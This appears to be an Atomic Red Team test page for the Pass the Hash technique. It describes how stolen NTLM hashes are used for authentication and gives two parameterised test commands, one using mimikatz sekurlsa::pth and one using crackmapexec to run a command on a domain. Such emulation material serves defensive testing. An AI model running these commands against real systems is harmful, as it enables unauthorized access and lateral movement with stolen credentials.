Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash. In this technique, valid password hashes for the account being used are captured using a Credential Access technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems.Windows 7 and higher with KB2871997 require valid domain user credentials or RID 500 administrator hashes. (Citation: NSA Spotting)
Note: must dump hashes first Reference
Supported Platforms: Windows
| Name | Description | Type | Default Value |
|---|---|---|---|
| user_name | username | string | Administrator |
| domain | domain | string | atomic.local |
| ntlm | ntlm hash | string | cc36cf7a8514893efccd3324464tkg1a |
mimikatz # sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}
command execute with crackmapexec
Supported Platforms: Windows
| Name | Description | Type | Default Value |
|---|---|---|---|
| user_name | username | string | Administrator |
| domain | domain | string | atomic.local |
| ntlm | command | string | cc36cf7a8514893efccd3324464tkg1a |
| command | command to execute | string | whoami |
| crackmapexec_exe | crackmapexec windows executable | Path | C:\CrackMapExecWin\crackmapexec.exe |
crackmapexec #{domain} -u #{user_name} -H #{ntlm} -x #{command}
if(Test-Path #{crackmapexec_exe}) { 0 } else { -1 }
Write-Host Automated installer not implemented yet, please install crackmapexec manually at this location: #{crackmapexec_exe}